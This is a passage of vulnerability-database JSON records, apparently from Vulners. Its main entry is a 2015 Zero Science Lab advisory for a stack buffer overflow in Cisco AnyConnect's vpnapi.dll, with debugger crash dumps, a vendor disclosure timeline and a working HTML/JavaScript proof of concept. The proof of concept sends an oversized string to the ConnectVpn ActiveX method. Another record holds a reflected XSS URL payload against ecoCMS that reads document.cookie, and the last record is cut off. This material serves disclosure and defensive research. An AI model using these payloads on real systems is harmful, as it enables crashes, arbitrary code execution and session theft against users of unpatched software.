"published"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "91aad38014ecd6c9585176f5bacd2246", "key": "reporter"}, {"hash": "5914f4e9fe3de88c4caaee7f73465efd", "key": "sourceData"}, {"hash": "0671b83e38251c0cb2c056713a02d4db", "key": "href"}], "objectVersion": "1.0"}}], "description": "Cisco AnyConnect Secure Mobility Client VPN API suffers from a stack buffer overflow vulnerability when parsing large amount of bytes to the 'strHostNameOrAddress' parameter in 'ConnectVpn' function which resides in the vpnapi.dll library, resulting in memory corruption and overflow of the stack. An attacker can gain access to the system of the affected node and execute arbitrary code.", "hash": "ea6f79a308eb25c27a240449296882c665fb4d320900065b4408600b237551b5", "enchantments": {"score": {"value": 10.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-4591"]}], "modified": "2018-04-12T05:52:00"}, "vulnersScore": 10.0}, "type": "zdt", "lastseen": "2018-04-12T05:52:00", "edition": 2, "title": "Cisco AnyConnect Secure Mobility 2.x, 3.x, 4.x - Client DoS PoC", "href": "https://0day.today/exploit/description/23757", "modified": "2015-06-16T00:00:00", "bulletinFamily": "exploit", "viewCount": 5, "cvelist": [], "sourceHref": "https://0day.today/exploit/23757", "references": [], "reporter": "LiquidWorm", "sourceData": "<!--\r\n \r\nCisco AnyConnect Secure Mobility Client Remote Command Execution\r\n \r\n \r\nVendor: Cisco Systems, Inc.\r\nProduct web page: http://www.cisco.com\r\nAffected version: 2.x\r\n 3.0\r\n 3.0.0A90\r\n 3.1.0472\r\n 3.1.05187\r\n 3.1.06073\r\n 3.1.06078\r\n 3.1.06079\r\n 3.1.07021\r\n 3.1.08009\r\n 4.0.00013\r\n 4.0.00048\r\n 4.0.00051\r\n 4.0.02052\r\n 4.0.00057\r\n 4.0.00061\r\n 4.1.00028\r\n \r\nFixed in: 3.1.09005\r\n 4.0.04006\r\n 4.1.02004\r\n 4.1.02011\r\n \r\nSummary: Cisco AnyConnect Secure Mobility Solution empowers your\r\nemployees to work from anywhere, on corporate laptops as well as\r\npersonal mobile devices, regardless of physical location. It provides\r\nthe security necessary to help keep your organization\u00e2\u20ac\u2122s data safe\r\nand protected.\r\n \r\nDesc: The AnyConnect Secure Mobility Client VPN API suffers from\r\na stack buffer overflow vulnerability when parsing large amount of\r\nbytes to the 'strHostNameOrAddress' parameter in 'ConnectVpn' function\r\nwhich resides in the vpnapi.dll library, resulting in memory corruption\r\nand overflow of the stack. An attacker can gain access to the system\r\nof the affected node and execute arbitrary code.\r\n \r\n==========================================================================\r\n \r\n(f48.10cc): Unknown exception - code 000006ba (first chance)\r\n(f48.10cc): C++ EH exception - code e06d7363 (first chance)\r\n(f48.10cc): C++ EH exception - code e06d7363 (first chance)\r\n(f48.10cc): Stack overflow - code c00000fd (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\Program Files (x86)\\Cisco\\Cisco AnyConnect Secure Mobility Client\\vpnapi.dll - \r\neax=00232000 ebx=02df9128 ecx=00000000 edx=088f0024 esi=01779c42 edi=088f0022\r\neip=748b6227 esp=0032ea14 ebp=0032eab0 iopl=0 nv up ei pl nz na pe nc\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206\r\nvpnapi!ConnectIfcData::setConfigCookie+0x9195:\r\n748b6227 8500 test dword ptr [eax],eax ds:002b:00232000=00000000\r\n0:000> g\r\n(f48.10cc): Stack overflow - code c00000fd (!!! second chance !!!)\r\neax=00232000 ebx=02df9128 ecx=00000000 edx=088f0024 esi=01779c42 edi=088f0022\r\neip=748b6227 esp=0032ea14 ebp=0032eab0 iopl=0 nv up ei pl nz na pe nc\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206\r\nvpnapi!ConnectIfcData::setConfigCookie+0x9195:\r\n748b6227 8500 test dword ptr [eax],eax ds:002b:00232000=00000000\r\n0:000> d edi\r\n088f0022 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n088f0032 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n088f0042 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n088f0052 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n088f0062 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n088f0072 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n088f0082 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n088f0092 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n0:000> d edx\r\n088f0024 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n088f0034 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n088f0044 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n088f0054 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n088f0064 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n088f0074 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n088f0084 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n088f0094 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n \r\n<12308000 B\r\n \r\n----\r\n \r\n>512150-512154 B\r\n \r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\Windows\\syswow64\\RPCRT4.dll - \r\neax=004d2384 ebx=76e9b7e4 ecx=00193214 edx=00000000 esi=00193214 edi=00193738\r\neip=75440fc4 esp=00193000 ebp=00193008 iopl=0 nv up ei pl nz na pe nc\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206\r\nRPCRT4!UuidCreate+0x835:\r\n75440fc4 56 push esi\r\n0:000> g\r\n(1a50.1e40): Stack overflow - code c00000fd (!!! second chance !!!)\r\neax=004d2384 ebx=76e9b7e4 ecx=00193214 edx=00000000 esi=00193214 edi=00193738\r\neip=75440fc4 esp=00193000 ebp=00193008 iopl=0 nv up ei pl nz na pe nc\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206\r\nRPCRT4!UuidCreate+0x835:\r\n75440fc4 56 push esi\r\n0:000> d eax\r\n004d2384 46 75 6e 63 74 69 6f 6e-3a 20 43 6c 69 65 6e 74 Function: Client\r\n004d2394 49 66 63 42 61 73 65 3a-3a 67 65 74 43 6f 6e 6e IfcBase::getConn\r\n004d23a4 65 63 74 4d 67 72 0a 46-69 6c 65 3a 20 2e 5c 43 ectMgr.File: .\\C\r\n004d23b4 6c 69 65 6e 74 49 66 63-42 61 73 65 2e 63 70 70 lientIfcBase.cpp\r\n004d23c4 0a 4c 69 6e 65 3a 20 32-35 38 30 0a 43 61 6c 6c .Line: 2580.Call\r\n004d23d4 20 74 6f 20 67 65 74 43-6f 6e 6e 65 63 74 4d 67 to getConnectMg\r\n004d23e4 72 20 77 68 65 6e 20 6e-6f 74 20 63 6f 6e 6e 65 r when not conne\r\n004d23f4 63 74 65 64 20 74 6f 20-41 67 65 6e 74 2e 00 00 cted to Agent...\r\n0:000> d\r\n004d2404 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................\r\n004d2414 00 00 00 00 41 41 41 41-41 41 41 41 41 41 41 41 ....AAAAAAAAAAAA\r\n004d2424 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\r\n004d2434 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\r\n004d2444 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\r\n004d2454 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\r\n004d2464 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\r\n004d2474 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\r\n0:000> d esp+1500\r\n00194500 00 00 00 00 f8 e6 28 00-ec 3c 85 74 04 00 00 00 ......(..<.t....\r\n00194510 ff ff ff ff 00 00 00 00-00 00 00 00 00 00 00 00 ................\r\n00194520 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\r\n00194530 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\r\n00194540 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\r\n00194550 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\r\n00194560 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\r\n00194570 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\r\n \r\n==========================================================================\r\n \r\n \r\nTested on: Microsoft Windows 7 Professional SP1 (EN)\r\n Microsoft Windows 7 Ultimate SP1 (EN)\r\n \r\n \r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n \r\n \r\nVendor status:\r\n \r\n[25.03.2015] Vulnerability discovered.\r\n[28.03.2015] Vendor contacted.\r\n[29.03.2015] Vendor responds asking more details.\r\n[13.04.2015] Sent details to the vendor.\r\n[15.04.2015] Asked vendor for status update.\r\n[15.04.2015] Vendor opens case #PSIRT-0089839229, informing that as soon as incident manager takes ownership of the case they will be in contact.\r\n[22.04.2015] Asked vendor for status update.\r\n[28.04.2015] No reply from the vendor.\r\n[04.05.2015] Asked vendor for status update.\r\n[05.05.2015] Vendor assigns case PSIRT-0089839229, defect CSCuu18805 under investigation.\r\n[12.05.2015] Asked vendor for confirmation.\r\n[13.05.2015] Vendor resolved the issue, not sure for the release date.\r\n[14.05.2015] Asked vendor for approximate scheduled release date.\r\n[15.05.2015] Vendor informs that the defect is public (CSCuu18805).\r\n[19.05.2015] Asked vendor for release information.\r\n[19.05.2015] Vendor informs releases expected to be on June 7th for 3.1 MR9 and May 31st for 4.1 MR2.\r\n[11.06.2015] Vendor releases version 4.1.02011 and 3.1.09005 to address this issue.\r\n[13.06.2015] Public security advisory released.\r\n \r\n \r\nAdvisory ID: ZSL-2015-5246\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5246.php\r\nVendor: https://tools.cisco.com/bugsearch/bug/CSCuu18805\r\n \r\n \r\n25.03.2015\r\n \r\n-->\r\n \r\n \r\n<!DOCTYPE html>\r\n<html>\r\n<head>\r\n<title>Cisco AnyConnect Secure Mobility Client VPN API Stack Overflow</title>\r\n</head>\r\n<body>\r\n<button onclick=\"O_o()\">Launch</button>\r\n<object id=\"cisco\" classid=\"clsid:{C15C0F4F-DDFB-4591-AD53-C9A71C9C15C0}\"></object>\r\n<script language=\"JavaScript\">\r\n \r\nfunction O_o() {\r\n //targetFile = \"C:\\Program Files (x86)\\Cisco\\Cisco AnyConnect Secure Mobility Client\\vpnapi.dll\"\r\n //prototype = \"Sub ConnectVpn ( ByVal strHostNameOrAddress As String )\"\r\n //memberName = \"ConnectVpn\"\r\n //progid = \"VpnApiLib.VpnApi\"\r\n \r\n var netv = Array(255712).join(\"ZS\");\r\n var push = //~~~~~~~~~~~~~~~~~~~~~~~~//\r\n \r\n /*(()()())*/\r\n \"ZSZSZSZSZSZSZ\"+\r\n \"SZSZSZSZSZSZSZS\"+\r\n \"ZSZSZSZSZSZSZSZSZSZS\"+\r\n \"ZSZSZSZSZSZSZSZSZSZSZSZS\"+\r\n \"ZSZSZSZSZSZSZSZSZSZSZSZSZS\"+\r\n \"ZSZSZSZ\"+ \"SZSZ\" +\"SZSZSZ\"+\r\n \"SZSZSZ\"+ \"SZSZ\" +\"SZSZSZ\"+\r\n \"SZSZS\"+ \"ZSZS\" +\"ZSZSZ\"+\r\n \"SZSZS\"+ \"ZSZS\" +\"ZSZSZ\"+\r\n \"SZSZS\"+\"ZSZSZ\"+\"SZSZS\"+\r\n \"SZSZSZSZSZSZSZSZSZSZSZS\"+\r\n \"ZSZSZSZSZSZSZSZSZSZSZSZSZ\"+\r\n \"SZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZS\"+\r\n \"ZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZ\"+\r\n \"SZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZS\"+\r\n \"ZSZSZSZ\" +\"SZSZSZSZSZSZ\"+ \"SZSZ\"+\r\n \"SZSZSZS\" +\"ZSZSZSZSZSZSZS\"+ \"ZSZS\"+\r\n \"ZSZSZSZ\" +\"SZSZSZSZSZSZSZ\"+ \"SZSZ\"+\r\n \"SZSZSZSZ\"+ \"SZSZSZSZSZSZSZSZS\"+ \"ZSZSZ\"+\r\n \"SZS\"+ \"ZSZ\"+ \"SZS\"+ \"ZSZ\" +\"SZS\" +\"ZSZ\"+\r\n \"SZS\"+ \"ZSZ\"+ \"SZS\"+ \"ZSZ\" +\"SZS\" +\"ZSZ\"+\r\n \"SZS\"+ \"ZSZ\"+ \"SZS\"+ \"ZSZ\" +\"SZS\" +\"ZSZ\"+\r\n \"SZS\"+ \"ZSZ\"+ \"SZS\"+ \"ZSZ\" +\"SZS\" +\"ZSZ\"+\r\n \"SZS\"+ \"ZSZ\"+ \"SZS\"+ \"ZSZ\" +\"SZS\" +\"ZSZ\"+\r\n \"SZS\"+ \"ZSZ\"+ \"SZS\"+ \"ZSZ\" +\"SZS\" +\"ZSZ\"+\r\n \"SZS\"+ \"ZSZ\"+ \"SZS\" +\"ZSZ\" +\"SZS\" +\"ZSZ\"+\r\n \"SZS\"+ \"ZSZ\"+ \"SZS\"+ \"ZSZ\"+ \"SZS\" +\"ZSZ\"+\r\n \"SZS\"+ \"ZSZ\"+ \"SZS\"+ \"ZSZ\"+ \"SZS\" +\"ZSZ\"+\r\n \"SZS\"+ \"ZSZ\"+ \"SZS\"+ \"ZSZ\"+ \"SZS\" +\"ZSZ\"+\r\n \"SZS\"+ \"ZSZ\"+ \"SZS\"+ \"ZSZ\"+ \"SZS\" +\"ZSZ\"+\r\n \"SZS\"+ \"ZSZ\"+ \"SZS\"+ \"ZSZ\"+ \"SZS\" +\"ZSZ\"+\r\n \"SZS\"+ \"ZSZ\"+ \"SZS\"+ \"ZSZ\"+ \"SZS\" +\"ZSZ\"+\r\n \"SZS\"+ \"ZSZ\"+ \"SZS\"+ \"ZSZ\"+ \"SZS\" +\"ZSZ\"+\r\n \"SZS\"+ \"ZSZ\"+ \"SZS\"+ \"ZSZ\"+ \"SZS\" +\"ZSZ\"+\r\n \"SZS\"+ \"ZSZ\"+ \"SZS\"+ \"ZSZ\"+ \"SZS\" +\"ZSZ\"+\r\n \"SZ\" +\"SZ\" +\"SZ\" +\"SZ\" +\"SZ\"+ \"SZ\"+\r\n \"SZ\" +\"SZ\" +\"SZ\" +\"SZ\" +\"SZ\"+ \"SZ\"+\r\n \"S\"+ \"Z\"+ \"S\"+ \"Z\"+ \"S\"+ \"Z\"+\r\n \"S\"+ \"Z\"+ \"S\"+ \"Z\"+ \"S\"+ \"S\"+\r\n \"S\"+ \"Z\"+ \"S\"+ \"Z\"+ \"S\"+ \"S\";\r\n \r\n \r\n var godeep = netv.concat(push);\r\n cisco.ConnectVpn godeep\r\n}\r\n \r\n</script>\r\n</body>\r\n</html>\n\n# 0day.today [2018-04-12] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "01408973d70250864c39c42ff0344a75", "key": "description"}, {"hash": "6722075f22c6fc4b1a3e6d1a741a1af5", "key": "href"}, {"hash": "5be39c0e5ca0e4098c5ff16d63e248fe", "key": "modified"}, {"hash": "5be39c0e5ca0e4098c5ff16d63e248fe", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "91aad38014ecd6c9585176f5bacd2246", "key": "reporter"}, {"hash": "d9360f54299df68ad0a7c29b1582736e", "key": "sourceData"}, {"hash": "9062b49b6ec26834cf34a2c716c43be4", "key": "sourceHref"}, {"hash": "6294dd6c1fbdf227e831168c829925c4", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"zeroscience": [{"lastseen": "2019-05-11T13:21:21", "bulletinFamily": "exploit", "description": "Title: Cisco AnyConnect Secure Mobility Client Remote Command Execution \nAdvisory ID: [ZSL-2015-5246](<ZSL-2015-5246.php>) \nType: Local/Remote \nImpact: System Access, DoS \nRisk: (4/5) \nRelease Date: 13.06.2015 \n\n\n##### Summary\n\nCisco AnyConnect Secure Mobility Solution empowers your employees to work from anywhere, on corporate laptops as well as personal mobile devices, regardless of physical location. It provides the security necessary to help keep your organization\u2019s data safe and protected. \n\n##### Description\n\nThe AnyConnect Secure Mobility Client VPN API suffers from a stack buffer overflow vulnerability when parsing large amount of bytes to the 'strHostNameOrAddress' parameter in 'ConnectVpn' function which resides in the vpnapi.dll library, resulting in memory corruption and overflow of the stack. An attacker can gain access to the system of the affected node and execute arbitrary code. \n \n\\-------------------------------------------------------------------------------- \n \n` (f48.10cc): Unknown exception - code 000006ba (first chance) \n(f48.10cc): C++ EH exception - code e06d7363 (first chance) \n(f48.10cc): C++ EH exception - code e06d7363 (first chance) \n(f48.10cc): Stack overflow - code c00000fd (first chance) \nFirst chance exceptions are reported before any exception handling. \nThis exception may be expected and handled. \n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\Program Files (x86)\\Cisco\\Cisco AnyConnect Secure Mobility Client\\vpnapi.dll - \neax=00232000 ebx=02df9128 ecx=00000000 edx=088f0024 esi=01779c42 edi=088f0022 \neip=748b6227 esp=0032ea14 ebp=0032eab0 iopl=0 nv up ei pl nz na pe nc \ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206 \nvpnapi!ConnectIfcData::setConfigCookie+0x9195: \n748b6227 8500 test dword ptr [eax],eax ds:002b:00232000=00000000 \n0:000> g \n(f48.10cc): Stack overflow - code c00000fd (!!! second chance !!!) \neax=00232000 ebx=02df9128 ecx=00000000 edx=088f0024 esi=01779c42 edi=088f0022 \neip=748b6227 esp=0032ea14 ebp=0032eab0 iopl=0 nv up ei pl nz na pe nc \ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206 \nvpnapi!ConnectIfcData::setConfigCookie+0x9195: \n748b6227 8500 test dword ptr [eax],eax ds:002b:00232000=00000000 \n0:000> d edi \n088f0022 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n088f0032 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n088f0042 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n088f0052 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n088f0062 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n088f0072 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n088f0082 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n088f0092 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n0:000> d edx \n088f0024 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n088f0034 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n088f0044 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n088f0054 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n088f0064 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n088f0074 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n088f0084 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n088f0094 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n \n<12308000 B \n \n---- \n \n>512150-512154 B \n \nFirst chance exceptions are reported before any exception handling. \nThis exception may be expected and handled. \n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\Windows\\syswow64\\RPCRT4.dll - \neax=004d2384 ebx=76e9b7e4 ecx=00193214 edx=00000000 esi=00193214 edi=00193738 \neip=75440fc4 esp=00193000 ebp=00193008 iopl=0 nv up ei pl nz na pe nc \ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206 \nRPCRT4!UuidCreate+0x835: \n75440fc4 56 push esi \n0:000> g \n(1a50.1e40): Stack overflow - code c00000fd (!!! second chance !!!) \neax=004d2384 ebx=76e9b7e4 ecx=00193214 edx=00000000 esi=00193214 edi=00193738 \neip=75440fc4 esp=00193000 ebp=00193008 iopl=0 nv up ei pl nz na pe nc \ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206 \nRPCRT4!UuidCreate+0x835: \n75440fc4 56 push esi \n0:000> d eax \n004d2384 46 75 6e 63 74 69 6f 6e-3a 20 43 6c 69 65 6e 74 Function: Client \n004d2394 49 66 63 42 61 73 65 3a-3a 67 65 74 43 6f 6e 6e IfcBase::getConn \n004d23a4 65 63 74 4d 67 72 0a 46-69 6c 65 3a 20 2e 5c 43 ectMgr.File: .\\C \n004d23b4 6c 69 65 6e 74 49 66 63-42 61 73 65 2e 63 70 70 lientIfcBase.cpp \n004d23c4 0a 4c 69 6e 65 3a 20 32-35 38 30 0a 43 61 6c 6c .Line: 2580.Call \n004d23d4 20 74 6f 20 67 65 74 43-6f 6e 6e 65 63 74 4d 67 to getConnectMg \n004d23e4 72 20 77 68 65 6e 20 6e-6f 74 20 63 6f 6e 6e 65 r when not conne \n004d23f4 63 74 65 64 20 74 6f 20-41 67 65 6e 74 2e 00 00 cted to Agent... \n0:000> d \n004d2404 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ \n004d2414 00 00 00 00 41 41 41 41-41 41 41 41 41 41 41 41 ....AAAAAAAAAAAA \n004d2424 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA \n004d2434 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA \n004d2444 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA \n004d2454 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA \n004d2464 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA \n004d2474 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA \n0:000> d esp+1500 \n00194500 00 00 00 00 f8 e6 28 00-ec 3c 85 74 04 00 00 00 ......(..<.t....> 00194510 ff ff ff ff 00 00 00 00-00 00 00 00 00 00 00 00 ................ \n00194520 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA \n00194530 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA \n00194540 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA \n00194550 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA \n00194560 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA \n00194570 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA \n` \n\\-------------------------------------------------------------------------------- \n \n\n\n##### Vendor\n\nCisco Systems, Inc. - <http://www.cisco.com>\n\n##### Affected Version\n\n2.x \n3.0 \n3.0.0A90 \n3.1.0472 \n3.1.05187 \n3.1.06073 \n3.1.06078 \n3.1.06079 \n3.1.07021 \n3.1.08009 \n4.0.00013 \n4.0.00048 \n4.0.00051 \n4.0.02052 \n4.0.00057 \n4.0.00061 \n4.1.00028 \n\n##### Tested On\n\nMicrosoft Windows 7 Professional SP1 (EN) 32/64bit \nMicrosoft Windows 7 Ultimate SP1 (EN) 32/64bit \n\n##### Vendor Status\n\n[25.03.2015] Vulnerability discovered. \n[28.03.2015] Vendor contacted. \n[29.03.2015] Vendor responds asking more details. \n[13.04.2015] Sent details to the vendor. \n[15.04.2015] Asked vendor for status update. \n[15.04.2015] Vendor opens case #PSIRT-0089839229, informing that as soon as incident manager takes ownership of the case they will be in contact. \n[22.04.2015] Asked vendor for status update. \n[28.04.2015] No reply from the vendor. \n[04.05.2015] Asked vendor for status update. \n[05.05.2015] Vendor assigns case PSIRT-0089839229, defect CSCuu18805 under investigation. \n[12.05.2015] Asked vendor for confirmation. \n[13.05.2015] Vendor resolved the issue, not sure for the release date. \n[14.05.2015] Asked vendor for approximate scheduled release date. \n[15.05.2015] Vendor informs that the defect is public (CSCuu18805). \n[19.05.2015] Asked vendor for release information. \n[19.05.2015] Vendor informs releases expected to be on June 7th for 3.1 MR9 and May 31st for 4.1 MR2. \n[11.06.2015] Vendor releases version 4.1.02011 and 3.1.09005 to address this issue. \n[13.06.2015] Public security advisory released. \n\n##### PoC\n\n[anyconnect_bof.html](<../../codes/anyconnect_bof.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <https://tools.cisco.com/bugsearch/bug/CSCuu18805> \n[2] <http://cxsecurity.com/issue/WLB-2015060070> \n[3] <https://packetstormsecurity.com/files/132298> \n[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/103855> \n[5] <https://www.exploit-db.com/exploits/37287/> \n[6] <http://www.scip.ch/en/?vuldb.75948> \n[7] <http://www.vfocus.net/art/20150616/12230.html> \n[8] <https://www.cert.se/2015/06/sakerhetsbrist-i-cisco-anyconnect-secure-mobility-client> \n[9] <http://tif.mcafee.com/threats/14712>\n\n##### Changelog\n\n[13.06.2015] - Initial release \n[17.06.2015] - Added reference [2], [3], [4], [5] and [6] \n[23.06.2015] - Added reference [7], [8] and [9] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "modified": "2015-06-13T00:00:00", "published": "2015-06-13T00:00:00", "id": "ZSL-2015-5246", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2015-5246.php", "title": "Cisco AnyConnect Secure Mobility Client Remote Command Execution", "type": "zeroscience", "sourceData": "REQUEST LIMIT REACHED", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/anyconnect_bof.txt"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:34", "bulletinFamily": "software", "description": "Vulnerability ID: HTB22353\r\nReference: http://www.htbridge.ch/advisory/xss_in_ecocms.html\r\nProduct: ecoCMS\r\nVendor: ecoCMS Team\r\nVulnerable Version: Current at 18.04.2010 and Probably Prior Versions\r\nVendor Notification: 18 April 2010 \r\nVulnerability Type: XSS (Cross Site Scripting)\r\nStatus: Not Fixed, Vendor Alerted, Awaiting Vendor Response\r\nRisk level: Medium \r\nCredit: High-Tech Bridge SA (http://www.htbridge.ch/) \r\n\r\nVulnerability Details:\r\nUser can execute arbitrary JavaScript code within the vulnerable application. \r\n\r\nThe vulnerability exists due to failure in the "/admin.php" script to properly sanitize user-supplied input in "p" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.\r\n\r\nAn attacker can use browser to exploit this vulnerability. The following PoC is available: \r\n\r\n\r\nhttp://example.com/admin.php?p=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E\r\n\r\n", "modified": "2010-05-04T00:00:00", "published": "2010-05-04T00:00:00", "id": "SECURITYVULNS:DOC:23757", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23757", "title": "XSS in ecoCMS", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-01-01T20:58:47", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2009-05-26T00:00:00", "published": "2009-05-26T00:00:00", "id": "1337DAY-ID-5246", "href": "https://0day.today/exploit/description/5246", "type": "zdt", "title": "Wordpress Plugin Lytebox (wp-lytebox) Local File Inclusion Vulnerability", "sourceData": "========================================================================\r\nWordpress Plugin Lytebox (wp-lytebox) Local File Inclusion Vulnerability\r\n========================================================================\r\n\r\n\r\nWP Plugin 